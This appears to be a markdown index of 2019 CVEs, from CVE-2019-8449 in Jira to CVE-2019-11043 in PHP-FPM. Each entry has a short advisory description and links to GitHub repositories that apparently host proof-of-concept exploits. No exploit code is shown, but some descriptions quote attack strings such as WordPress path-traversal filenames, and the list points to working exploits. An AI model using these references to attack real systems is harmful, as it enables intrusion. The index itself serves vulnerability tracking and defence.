### CVE-2019-8449 (2019-09-11)

The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.

- [mufeedvh/CVE-2019-8449](https://github.com/mufeedvh/CVE-2019-8449)
- [r0lh/CVE-2019-8449](https://github.com/r0lh/CVE-2019-8449)

### CVE-2019-8451 (2019-09-11)

The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.

- [0xbug/CVE-2019-8451](https://github.com/0xbug/CVE-2019-8451)
- [ianxtianxt/CVE-2019-8451](https://github.com/ianxtianxt/CVE-2019-8451)
- [jas502n/CVE-2019-8451](https://github.com/jas502n/CVE-2019-8451)
- [h0ffayyy/Jira-CVE-2019-8451](https://github.com/h0ffayyy/Jira-CVE-2019-8451)

### CVE-2019-8540 (2019-12-18)

A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, macOS Mojave 10.14.4, tvOS 12.2, watchOS 5.2. A malicious application may be able to determine kernel memory layout.

- [maldiohead/CVE-2019-8540](https://github.com/maldiohead/CVE-2019-8540)

### CVE-2019-8561 (2019-12-18)

A logic issue was addressed with improved validation. This issue is fixed in macOS Mojave 10.14.4. A malicious application may be able to elevate privileges.

- [0xmachos/CVE-2019-8561](https://github.com/0xmachos/CVE-2019-8561)

### CVE-2019-8591 (2019-12-18)

A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1. An application may be able to cause unexpected system termination or write kernel memory.

- [jsherman212/used_sock](https://github.com/jsherman212/used_sock)

### CVE-2019-8601 (2019-12-18)

Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.

- [BadAccess11/CVE-2019-8601](https://github.com/BadAccess11/CVE-2019-8601)

### CVE-2019-8605 (2019-12-18)

A use after free issue was addressed with improved memory management. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1. A malicious application may be able to execute arbitrary code with system privileges.

- [1nteger-c/CVE-2019-8605](https://github.com/1nteger-c/CVE-2019-8605)

### CVE-2019-8627
- [maldiohead/CVE-2019-8627](https://github.com/maldiohead/CVE-2019-8627)

### CVE-2019-8641 (2019-12-18)

An out-of-bounds read was addressed with improved input validation.

- [chia33164/CVE-2019-8641-reproduction](https://github.com/chia33164/CVE-2019-8641-reproduction)

### CVE-2019-8656 (2020-10-27)

This was addressed with additional checks by Gatekeeper on files mounted through a network share. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra. Extracting a zip file containing a symbolic link to an endpoint in an NFS mount that is attacker controlled may bypass Gatekeeper.

- [D00MFist/CVE-2019-8656](https://github.com/D00MFist/CVE-2019-8656)

### CVE-2019-8781 (2019-12-18)

A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15. An application may be able to execute arbitrary code with kernel privileges.

- [A2nkF/macOS-Kernel-Exploit](https://github.com/A2nkF/macOS-Kernel-Exploit)
- [TrungNguyen1909/CVE-2019-8781-macOS](https://github.com/TrungNguyen1909/CVE-2019-8781-macOS)

### CVE-2019-8791 (2019-12-18)

An issue existed in the parsing of URL schemes. This issue was addressed with improved URL validation. This issue is fixed in Shazam Android App Version 9.25.0, Shazam iOS App Version 12.11.0. Processing a maliciously crafted URL may lead to an open redirect.

- [ashleykinguk/Shazam-CVE-2019-8791-CVE-2019-8792](https://github.com/ashleykinguk/Shazam-CVE-2019-8791-CVE-2019-8792)

### CVE-2019-8805 (2019-12-18)

A validation issue existed in the entitlement verification. This issue was addressed with improved validation of the process entitlement. This issue is fixed in macOS Catalina 10.15.1. An application may be able to execute arbitrary code with system privileges.

- [securelayer7/CVE-2019-8805](https://github.com/securelayer7/CVE-2019-8805)

### CVE-2019-8852 (2020-10-27)

A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra. An application may be able to execute arbitrary code with kernel privileges.

- [pattern-f/CVE-2019-8852](https://github.com/pattern-f/CVE-2019-8852)

### CVE-2019-8936 (2019-05-15)

NTP through 4.2.8p12 has a NULL Pointer Dereference.

- [snappyJack/CVE-2019-8936](https://github.com/snappyJack/CVE-2019-8936)

### CVE-2019-8942 (2019-02-20)

WordPress before 4.9.9 and 5.x before 5.0.1 allows remote code execution because a _wp_attached_file Post Meta entry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with author privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif metadata. Exploitation can leverage CVE-2019-8943.

- [brianwrf/WordPress_4.9.8_RCE_POC](https://github.com/brianwrf/WordPress_4.9.8_RCE_POC)
- [synacktiv/CVE-2019-8942](https://github.com/synacktiv/CVE-2019-8942)
- [synod2/WP_CROP_RCE](https://github.com/synod2/WP_CROP_RCE)
- [tuannq2299/CVE-2019-8942](https://github.com/tuannq2299/CVE-2019-8942)

### CVE-2019-8943 (2019-02-20)

WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.

- [v0lck3r/CVE-2019-8943](https://github.com/v0lck3r/CVE-2019-8943)
- [hadrian3689/wordpress_cropimage](https://github.com/hadrian3689/wordpress_cropimage)

### CVE-2019-8956 (2019-04-01)

In the Linux Kernel before versions 4.20.8 and 4.19.21 a use-after-free error in the "sctp_sendmsg()" function (net/sctp/socket.c) when handling SCTP_SENDALL flag can be exploited to corrupt memory.

- [butterflyhack/CVE-2019-8956](https://github.com/butterflyhack/CVE-2019-8956)

### CVE-2019-8978 (2019-05-14)

An improper authentication vulnerability can be exploited through a race condition that occurs in Ellucian Banner Web Tailor 8.8.3, 8.8.4, and 8.9 and Banner Enterprise Identity Services 8.3, 8.3.1, 8.3.2, and 8.4, in conjunction with SSO Manager. This vulnerability allows remote attackers to steal a victim's session (and cause a denial of service) by repeatedly requesting the initial Banner Web Tailor main page with the IDMSESSID cookie set to the victim's UDCID, which in the case tested is the institutional ID. During a login attempt by a victim, the attacker can leverage the race condition and will be issued the SESSID that was meant for this victim.

- [SecKatie/CVE-2019-8978](https://github.com/SecKatie/CVE-2019-8978)

### CVE-2019-8979 (2019-02-21)

Kohana through 3.3.6 has SQL Injection when the order_by() parameter can be controlled.

- [elttam/ko7demo](https://github.com/elttam/ko7demo)

### CVE-2019-8985 (2019-02-21)

On Netis WF2411 with firmware 2.1.36123 and other Netis WF2xxx devices (possibly WF2411 through WF2880), there is a stack-based buffer overflow that does not require authentication. This can cause denial of service (device restart) or remote code execution. This vulnerability can be triggered by a GET request with a long HTTP "Authorization: Basic" header that is mishandled by user_auth->user_ok in /bin/boa.

- [Squirre17/CVE-2019-8985](https://github.com/Squirre17/CVE-2019-8985)

### CVE-2019-8997 (2019-03-21)

An XML External Entity Injection (XXE) vulnerability in the Management System (console) of BlackBerry AtHoc versions earlier than 7.6 HF-567 could allow an attacker to potentially read arbitrary local files from the application server or make requests on the network by entering maliciously crafted XML in an existing field.

- [nxkennedy/CVE-2019-8997](https://github.com/nxkennedy/CVE-2019-8997)

### CVE-2019-9053 (2019-03-26)

An issue was discovered in CMS Made Simple 2.2.8. It is possible with the News module, through a crafted URL, to achieve unauthenticated blind time-based SQL injection via the m1_idlist parameter.

- [SUNNYSAINI01001/46635.py_CVE-2019-9053](https://github.com/SUNNYSAINI01001/46635.py_CVE-2019-9053)
- [h3xcr4ck3r/CVE-2019-9053](https://github.com/h3xcr4ck3r/CVE-2019-9053)
- [maraspiras/46635.py](https://github.com/maraspiras/46635.py)
- [e-renna/CVE-2019-9053](https://github.com/e-renna/CVE-2019-9053)
- [zmiddle/Simple_CMS_SQLi](https://github.com/zmiddle/Simple_CMS_SQLi)
- [ELIZEUOPAIN/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit](https://github.com/ELIZEUOPAIN/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit)
- [pedrojosenavasperez/CVE-2019-9053-Python3](https://github.com/pedrojosenavasperez/CVE-2019-9053-Python3)
- [Mahamedm/CVE-2019-9053-Exploit-Python-3](https://github.com/Mahamedm/CVE-2019-9053-Exploit-Python-3)
- [im-suman-roy/CVE-2019-9053](https://github.com/im-suman-roy/CVE-2019-9053)
- [bthnrml/guncel-cve-2019-9053.py](https://github.com/bthnrml/guncel-cve-2019-9053.py)
- [kahluri/CVE-2019-9053](https://github.com/kahluri/CVE-2019-9053)
- [Doc0x1/CVE-2019-9053-Python3](https://github.com/Doc0x1/CVE-2019-9053-Python3)
- [fernandobortotti/CVE-2019-9053](https://github.com/fernandobortotti/CVE-2019-9053)
- [byrek/CVE-2019-9053](https://github.com/byrek/CVE-2019-9053)
- [davcwikla/CVE-2019-9053-exploit](https://github.com/davcwikla/CVE-2019-9053-exploit)
- [BjarneVerschorre/CVE-2019-9053](https://github.com/BjarneVerschorre/CVE-2019-9053)
- [Jason-Siu/CVE-2019-9053-Exploit-in-Python-3](https://github.com/Jason-Siu/CVE-2019-9053-Exploit-in-Python-3)
- [FedericoTorres233/CVE-2019-9053-Fixed](https://github.com/FedericoTorres233/CVE-2019-9053-Fixed)
- [Dh4nuJ4/SimpleCTF-UpdatedExploit](https://github.com/Dh4nuJ4/SimpleCTF-UpdatedExploit)
- [TeymurNovruzov/CVE-2019-9053-python3-remastered](https://github.com/TeymurNovruzov/CVE-2019-9053-python3-remastered)
- [jtoalu/CTF-CVE-2019-9053-GTFOBins](https://github.com/jtoalu/CTF-CVE-2019-9053-GTFOBins)
- [Azrenom/CMS-Made-Simple-2.2.9-CVE-2019-9053](https://github.com/Azrenom/CMS-Made-Simple-2.2.9-CVE-2019-9053)
- [louisthedonothing/CVE-2019-9053](https://github.com/louisthedonothing/CVE-2019-9053)

### CVE-2019-9081
- [nth347/CVE-2019-9081_PoC](https://github.com/nth347/CVE-2019-9081_PoC)
- [scopion/cve-2019-9081](https://github.com/scopion/cve-2019-9081)
- [qafdevsec/CVE-2019-9081_PoC](https://github.com/qafdevsec/CVE-2019-9081_PoC)

### CVE-2019-9153 (2019-08-22)

Improper Verification of a Cryptographic Signature in OpenPGP.js <=4.1.2 allows an attacker to forge signed messages by replacing its signatures with a "standalone" or "timestamp" signature.

- [ZenyWay/opgp-service-cve-2019-9153](https://github.com/ZenyWay/opgp-service-cve-2019-9153)

### CVE-2019-9184 (2019-02-26)

SQL injection vulnerability in the J2Store plugin 3.x before 3.3.7 for Joomla! allows remote attackers to execute arbitrary SQL commands via the product_option[] parameter.

- [cved-sources/cve-2019-9184](https://github.com/cved-sources/cve-2019-9184)

### CVE-2019-9193 (2019-04-01)

In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.

- [wkjung0624/cve-2019-9193](https://github.com/wkjung0624/cve-2019-9193)
- [b4keSn4ke/CVE-2019-9193](https://github.com/b4keSn4ke/CVE-2019-9193)
- [chromanite/CVE-2019-9193-PostgreSQL-9.3-11.7](https://github.com/chromanite/CVE-2019-9193-PostgreSQL-9.3-11.7)
- [paulotrindadec/CVE-2019-9193](https://github.com/paulotrindadec/CVE-2019-9193)
- [geniuszlyy/CVE-2019-9193](https://github.com/geniuszlyy/CVE-2019-9193)
- [AxthonyV/CVE-2019-9193](https://github.com/AxthonyV/CVE-2019-9193)
- [A0be/CVE-2019-9193](https://github.com/A0be/CVE-2019-9193)

### CVE-2019-9194 (2019-02-26)

elFinder before 2.1.48 has a command injection vulnerability in the PHP connector.

- [cved-sources/cve-2019-9194](https://github.com/cved-sources/cve-2019-9194)

### CVE-2019-9202 (2019-03-28)

Nagios IM (component of Nagios XI) before 2.2.7 allows authenticated users to execute arbitrary code via API key issues.

- [polict/CVE-2019-9202](https://github.com/polict/CVE-2019-9202)

### CVE-2019-9465 (2020-01-07)

In the Titan M handling of cryptographic operations, there is a possible information disclosure due to an unusual root cause. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-10 Android ID: A-133258003

- [alexbakker/CVE-2019-9465](https://github.com/alexbakker/CVE-2019-9465)
- [MichaelsPlayground/CVE-2019-9465](https://github.com/MichaelsPlayground/CVE-2019-9465)

### CVE-2019-9506 (2019-08-14)

The Bluetooth BR/EDR specification up to and including version 5.1 permits sufficiently low encryption key length and does not prevent an attacker from influencing the key length negotiation. This allows practical brute-force attacks (aka "KNOB") that can decrypt traffic and inject arbitrary ciphertext without the victim noticing.

- [francozappa/knob](https://github.com/francozappa/knob)

### CVE-2019-9511 (2019-08-13)

Some HTTP/2 implementations are vulnerable to window size manipulation and stream prioritization manipulation, potentially leading to a denial of service. The attacker requests a large amount of data from a specified resource over multiple streams. They manipulate window size and stream priority to force the server to queue the data in 1-byte chunks. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.

- [flyniu666/ingress-nginx-0.21-1.19.5](https://github.com/flyniu666/ingress-nginx-0.21-1.19.5)

### CVE-2019-9580 (2019-03-09)

In st2web in StackStorm Web UI before 2.9.3 and 2.10.x before 2.10.3, it is possible to bypass the CORS protection mechanism via a "null" origin value, potentially leading to XSS.

- [mpgn/CVE-2019-9580](https://github.com/mpgn/CVE-2019-9580)

### CVE-2019-9596 (2019-10-23)

Darktrace Enterprise Immune System before 3.1 allows CSRF via the /whitelisteddomains endpoint.

- [gerwout/CVE-2019-9596-and-CVE-2019-9597](https://github.com/gerwout/CVE-2019-9596-and-CVE-2019-9597)

### CVE-2019-9599 (2019-03-06)

The AirDroid application through 4.2.1.6 for Android allows remote attackers to cause a denial of service (service crash) via many simultaneous sdctl/comm/lite_auth/ requests.

- [s4vitar/AirDroidPwner](https://github.com/s4vitar/AirDroidPwner)

### CVE-2019-9621 (2019-04-30)

Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.

- [k8gege/ZimbraExploit](https://github.com/k8gege/ZimbraExploit)

### CVE-2019-9653 (2019-05-31)

NUUO Network Video Recorder Firmware 1.7.x through 3.3.x allows unauthenticated attackers to execute arbitrary commands via shell metacharacters to handle_load_config.php.

- [grayoneday/CVE-2019-9653](https://github.com/grayoneday/CVE-2019-9653)

### CVE-2019-9670 (2019-05-29)

mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability, as demonstrated by Autodiscover/Autodiscover.xml.

- [rek7/Zimbra-RCE](https://github.com/rek7/Zimbra-RCE)
- [attackgithub/Zimbra-RCE](https://github.com/attackgithub/Zimbra-RCE)
- [oppsec/arbimz](https://github.com/oppsec/arbimz)
- [oppsec/zaber](https://github.com/oppsec/zaber)
- [Cappricio-Securities/CVE-2019-9670](https://github.com/Cappricio-Securities/CVE-2019-9670)
- [OracleNep/CVE-2019-9670-DtdFilegeneration](https://github.com/OracleNep/CVE-2019-9670-DtdFilegeneration)

### CVE-2019-9673 (2019-06-05)

Freenet 1483 has a MIME type bypass that allows arbitrary JavaScript execution via a crafted Freenet URI.

- [mgrube/CVE-2019-9673](https://github.com/mgrube/CVE-2019-9673)

### CVE-2019-9729 (2019-03-12)

In Shanda MapleStory Online V160, the SdoKeyCrypt.sys driver allows privilege escalation to NT AUTHORITY\SYSTEM because of not validating the IOCtl 0x8000c01c input value, leading to an integer signedness error and a heap-based buffer underflow.

- [HyperSine/SdoKeyCrypt-sys-local-privilege-elevation](https://github.com/HyperSine/SdoKeyCrypt-sys-local-privilege-elevation)
- [timeowilliamsq/HyperSine](https://github.com/timeowilliamsq/HyperSine)
- [recozone/HyperSine](https://github.com/recozone/HyperSine)
- [huangyutange0uywlcn/HyperSine](https://github.com/huangyutange0uywlcn/HyperSine)

### CVE-2019-9730 (2019-06-05)

Incorrect access control in the CxUtilSvc component of the Synaptics Sound Device drivers prior to version 2.29 allows a local attacker to increase access privileges to the Windows Registry via an unpublished API.

- [jthuraisamy/CVE-2019-9730](https://github.com/jthuraisamy/CVE-2019-9730)

### CVE-2019-9745 (2019-10-14)

CloudCTI HIP Integrator Recognition Configuration Tool allows privilege escalation via its EXQUISE integration. This tool communicates with a service (Recognition Update Client Service) via an insecure communication channel (Named Pipe). The data (JSON) sent via this channel is used to import data from CRM software using plugins (.dll files). The plugin to import data from the EXQUISE software (DatasourceExquiseExporter.dll) can be persuaded to start arbitrary programs (including batch files) that are executed using the same privileges as Recognition Update Client Service (NT AUTHORITY\SYSTEM), thus elevating privileges. This occurs because a higher-privileged process executes scripts from a directory writable by a lower-privileged user.

- [KPN-CISO/CVE-2019-9745](https://github.com/KPN-CISO/CVE-2019-9745)

### CVE-2019-9766 (2019-03-14)

Stack-based buffer overflow in Free MP3 CD Ripper 2.6, when converting a file, allows user-assisted remote attackers to execute arbitrary code via a crafted .mp3 file.

- [moonheadobj/CVE-2019-9766](https://github.com/moonheadobj/CVE-2019-9766)
- [zeronohacker/CVE-2019-9766](https://github.com/zeronohacker/CVE-2019-9766)

### CVE-2019-9787 (2019-03-14)

WordPress before 5.1.1 does not properly filter comment content, leading to Remote Code Execution by unauthenticated users in a default configuration. This occurs because CSRF protection is mishandled, and because Search Engine Optimization of A elements is performed incorrectly, leading to XSS. The XSS results in administrative access, which allows arbitrary changes to .php files. This is related to wp-admin/includes/ajax-actions.php and wp-includes/comment.php.

- [rkatogit/cve-2019-9787_csrf_poc](https://github.com/rkatogit/cve-2019-9787_csrf_poc)
- [PalmTreeForest/CodePath_Week_7-8](https://github.com/PalmTreeForest/CodePath_Week_7-8)
- [sijiahi/Wordpress_cve-2019-9787_defense](https://github.com/sijiahi/Wordpress_cve-2019-9787_defense)
- [matinciel/Wordpress_CVE-2019-9787](https://github.com/matinciel/Wordpress_CVE-2019-9787)
- [dexXxed/CVE-2019-9787](https://github.com/dexXxed/CVE-2019-9787)
- [kuangting4231/mitigation-cve-2019-9787](https://github.com/kuangting4231/mitigation-cve-2019-9787)

### CVE-2019-9791 (2019-04-26)

The type inference system allows the compilation of functions that can cause type confusions between arbitrary objects when compiled through the IonMonkey just-in-time (JIT) compiler and when the constructor function is entered through on-stack replacement (OSR). This allows for possible arbitrary reading and writing of objects during an exploitable crash. This vulnerability affects Thunderbird < 60.6, Firefox ESR < 60.6, and Firefox < 66.

- [Sp0pielar/CVE-2019-9791](https://github.com/Sp0pielar/CVE-2019-9791)

### CVE-2019-9810 (2019-04-26)

Incorrect alias information in IonMonkey JIT compiler for Array.prototype.slice method may lead to missing bounds check and a buffer overflow. This vulnerability affects Firefox < 66.0.1, Firefox ESR < 60.6.1, and Thunderbird < 60.6.1.

- [xuechiyaobai/CVE-2019-9810-PoC](https://github.com/xuechiyaobai/CVE-2019-9810-PoC)
- [0vercl0k/CVE-2019-9810](https://github.com/0vercl0k/CVE-2019-9810)

### CVE-2019-9849 (2019-07-17)

LibreOffice has a 'stealth mode' in which only documents from locations deemed 'trusted' are allowed to retrieve remote resources. This mode is not the default mode, but can be enabled by users who want to disable LibreOffice's ability to include remote resources within a document. A flaw existed where bullet graphics were omitted from this protection prior to version 6.2.5. This issue affects: Document Foundation LibreOffice versions prior to 6.2.5.

- [mbadanoiu/CVE-2019-9849](https://github.com/mbadanoiu/CVE-2019-9849)

### CVE-2019-9896 (2019-03-21)

In PuTTY versions before 0.71 on Windows, local attackers could hijack the application by putting a malicious help file in the same directory as the executable.

- [yasinyilmaz/vuln-chm-hijack](https://github.com/yasinyilmaz/vuln-chm-hijack)

### CVE-2019-9978 (2019-03-24)

The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.

- [mpgn/CVE-2019-9978](https://github.com/mpgn/CVE-2019-9978)
- [hash3liZer/CVE-2019-9978](https://github.com/hash3liZer/CVE-2019-9978)
- [KTN1990/CVE-2019-9978](https://github.com/KTN1990/CVE-2019-9978)
- [cved-sources/cve-2019-9978](https://github.com/cved-sources/cve-2019-9978)
- [d3fudd/CVE-2019-9978_Exploit](https://github.com/d3fudd/CVE-2019-9978_Exploit)
- [grimlockx/CVE-2019-9978](https://github.com/grimlockx/CVE-2019-9978)
- [h8handles/CVE-2019-9978-Python3](https://github.com/h8handles/CVE-2019-9978-Python3)
- [0xMoonrise/cve-2019-9978](https://github.com/0xMoonrise/cve-2019-9978)
- [MAHajian/CVE-2019-9978](https://github.com/MAHajian/CVE-2019-9978)

### CVE-2019-10008 (2019-04-24)

Zoho ManageEngine ServiceDesk 9.3 allows session hijacking and privilege escalation because an established guest session is automatically converted into an established administrator session when the guest user enters the administrator username, with an arbitrary incorrect password, in an mc/ login attempt within a different browser tab.

- [ignis-sec/CVE-2019-10008](https://github.com/ignis-sec/CVE-2019-10008)

### CVE-2019-10086 (2019-08-20)

In Apache Commons Beanutils 1.9.2, a special BeanIntrospector class was added which allows suppressing the ability for an attacker to access the classloader via the class property available on all Java objects. However, this was not used by default in PropertyUtilsBean.

- [evilangelplus/CVE-2019-10086](https://github.com/evilangelplus/CVE-2019-10086)

### CVE-2019-10092 (2019-09-26)

In Apache HTTP Server 2.4.0-2.4.39, a limited cross-site scripting issue was reported affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.

- [motikan2010/CVE-2019-10092_Docker](https://github.com/motikan2010/CVE-2019-10092_Docker)
- [mbadanoiu/CVE-2019-10092](https://github.com/mbadanoiu/CVE-2019-10092)

### CVE-2019-10149 (2019-06-05)

A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.

- [bananaphones/exim-rce-quickfix](https://github.com/bananaphones/exim-rce-quickfix)
- [cowbe0x004/eximrce-CVE-2019-10149](https://github.com/cowbe0x004/eximrce-CVE-2019-10149)
- [MNEMO-CERT/PoC--CVE-2019-10149_Exim](https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim)
- [aishee/CVE-2019-10149-quick](https://github.com/aishee/CVE-2019-10149-quick)
- [AzizMea/CVE-2019-10149-privilege-escalation](https://github.com/AzizMea/CVE-2019-10149-privilege-escalation)
- [Brets0150/StickyExim](https://github.com/Brets0150/StickyExim)
- [Chris-dev1/exim.exp](https://github.com/Chris-dev1/exim.exp)
- [darsigovrustam/CVE-2019-10149](https://github.com/darsigovrustam/CVE-2019-10149)
- [Diefunction/CVE-2019-10149](https://github.com/Diefunction/CVE-2019-10149)
- [Dilshan-Eranda/CVE-2019-10149](https://github.com/Dilshan-Eranda/CVE-2019-10149)
- [cloudflare/exim-cve-2019-10149-data](https://github.com/cloudflare/exim-cve-2019-10149-data)
- [Stick-U235/CVE-2019-10149-Exploit](https://github.com/Stick-U235/CVE-2019-10149-Exploit)
- [rahmadsandy/EXIM-4.87-CVE-2019-10149](https://github.com/rahmadsandy/EXIM-4.87-CVE-2019-10149)
- [hyim0810/CVE-2019-10149](https://github.com/hyim0810/CVE-2019-10149)
- [qlusec/CVE-2019-10149](https://github.com/qlusec/CVE-2019-10149)

### CVE-2019-10172 (2019-11-18)

A flaw was found in org.codehaus.jackson:jackson-mapper-asl:1.9.x libraries. XML external entity vulnerabilities similar to CVE-2016-3720 also affect the codehaus jackson-mapper-asl libraries, but in different classes.

- [rusakovichma/CVE-2019-10172](https://github.com/rusakovichma/CVE-2019-10172)

### CVE-2019-10207 (2019-11-25)

A flaw was found in the Linux kernel's Bluetooth implementation of UART, all versions kernel 3.x.x before 4.18.0 and kernel 5.x.x. An attacker with local access and write permissions to the Bluetooth hardware could use this flaw to issue a specially crafted ioctl function call and cause the system to crash.

- [butterflyhack/CVE-2019-10207](https://github.com/butterflyhack/CVE-2019-10207)

### CVE-2019-10220 (2019-11-27)

The Linux kernel CIFS implementation, version 4.9.0, is vulnerable to a relative paths injection in directory entry lists.

- [Trinadh465/linux-3.0.35_CVE-2019-10220](https://github.com/Trinadh465/linux-3.0.35_CVE-2019-10220)
- [hshivhare67/kernel_v4.1.15_CVE-2019-10220](https://github.com/hshivhare67/kernel_v4.1.15_CVE-2019-10220)

### CVE-2019-10392 (2019-09-12)

Jenkins Git Client Plugin 2.8.4 and earlier and 3.0.0-rc did not properly restrict values passed as URL argument to an invocation of 'git ls-remote', resulting in OS command injection.

- [jas502n/CVE-2019-10392](https://github.com/jas502n/CVE-2019-10392)
- [ftk-sostupid/CVE-2019-10392_EXP](https://github.com/ftk-sostupid/CVE-2019-10392_EXP)

### CVE-2019-10475 (2019-10-23)

A reflected cross-site scripting vulnerability in Jenkins build-metrics Plugin allows attackers to inject arbitrary HTML and JavaScript into web pages provided by this plugin.

- [vesche/CVE-2019-10475](https://github.com/vesche/CVE-2019-10475)

### CVE-2019-10678 (2019-03-31)

Domoticz before 4.10579 neglects to categorize \n and \r as insecure argument options.

- [cved-sources/cve-2019-10678](https://github.com/cved-sources/cve-2019-10678)

### CVE-2019-10685 (2019-05-24)

A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Heidelberg Prinect Archiver v2013 release 1.0.

- [alt3kx/CVE-2019-10685](https://github.com/alt3kx/CVE-2019-10685)

### CVE-2019-10708 (2019-04-02)

S-CMS PHP v1.0 has SQL injection via the 4/js/scms.php?action=unlike id parameter.

- [stavhaygn/CVE-2019-10708](https://github.com/stavhaygn/CVE-2019-10708)

### CVE-2019-10742 (2019-05-07)

Axios up to and including 0.18.0 allows attackers to cause a denial of service (application crash) by continuing to accept content after maxContentLength is exceeded.

- [Viniciuspxf/CVE-2019-10742](https://github.com/Viniciuspxf/CVE-2019-10742)

### CVE-2019-10758 (2019-12-24)

mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that use the `toBSON` method, due to a misuse of the `vm` dependency to perform `exec` commands in a non-safe environment.

- [masahiro331/CVE-2019-10758](https://github.com/masahiro331/CVE-2019-10758)
- [lp008/CVE-2019-10758](https://github.com/lp008/CVE-2019-10758)

### CVE-2019-10760 (2019-10-15)

safer-eval before 1.3.2 is vulnerable to Arbitrary Code Execution. A payload using constructor properties can escape the sandbox and execute arbitrary code.

- [lirantal/safer-eval-cve-CVE-2019-10760](https://github.com/lirantal/safer-eval-cve-CVE-2019-10760)

### CVE-2019-10779 (2020-01-28)

All versions of stroom:stroom-app before 5.5.12 and all versions of the 6.0.0 branch before 6.0.25 are affected by Cross-site Scripting. An attacker website is able to load the Stroom UI into a hidden iframe. Using that iframe, the attacker site can issue commands to the Stroom UI via an XSS vulnerability to take full control of the Stroom UI on behalf of the logged-in user.

- [RepublicR0K/CVE-2019-10779](https://github.com/RepublicR0K/CVE-2019-10779)

### CVE-2019-10869 (2019-05-07)

Path Traversal and Unrestricted File Upload exists in the Ninja Forms plugin before 3.0.23 for WordPress (when the Uploads add-on is activated). This allows an attacker to traverse the file system to access files and execute code via the includes/fields/upload.php (aka upload/submit page) name and tmp_name parameters.

- [KTN1990/CVE-2019-10869](https://github.com/KTN1990/CVE-2019-10869)

### CVE-2019-10915 (2019-07-11)

A vulnerability has been identified in TIA Administrator (All versions < V1.0 SP1 Upd1). The integrated configuration web application (TIA Administrator) allows execution of certain application commands without proper authentication. The vulnerability could be exploited by an attacker with local access to the affected system. Successful exploitation requires no privileges and no user interaction. An attacker could use the vulnerability to compromise the confidentiality, integrity, and availability of the affected system. At the time of advisory publication no public exploitation of this security vulnerability was known.

- [jiansiting/CVE-2019-10915](https://github.com/jiansiting/CVE-2019-10915)

### CVE-2019-10945 (2019-04-10)

An issue was discovered in Joomla! before 3.9.5. The Media Manager component does not properly sanitize the folder parameter, allowing attackers to act outside the media manager root directory.

- [dpgg101/CVE-2019-10945](https://github.com/dpgg101/CVE-2019-10945)

### CVE-2019-10999 (2019-05-06)

The D-Link DCS series of Wi-Fi cameras contains a stack-based buffer overflow in alphapd, the camera's web server. The overflow allows a remotely authenticated attacker to execute arbitrary code by providing a long string in the WEPEncryption parameter when requesting wireless.htm. Vulnerable devices include DCS-5009L (1.08.11 and below), DCS-5010L (1.14.09 and below), DCS-5020L (1.15.12 and below), DCS-5025L (1.03.07 and below), DCS-5030L (1.04.10 and below), DCS-930L (2.16.01 and below), DCS-931L (1.14.11 and below), DCS-932L (2.17.01 and below), DCS-933L (1.14.11 and below), and DCS-934L (1.05.04 and below).

- [tacnetsol/CVE-2019-10999](https://github.com/tacnetsol/CVE-2019-10999)
- [qjh2333/CVE-2019-10999](https://github.com/qjh2333/CVE-2019-10999)

### CVE-2019-11043 (2019-10-28)

In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.

- [neex/phuip-fpizdam](https://github.com/neex/phuip-fpizdam)
- [B1gd0g/CVE-2019-11043](https://github.com/B1gd0g/CVE-2019-11043)
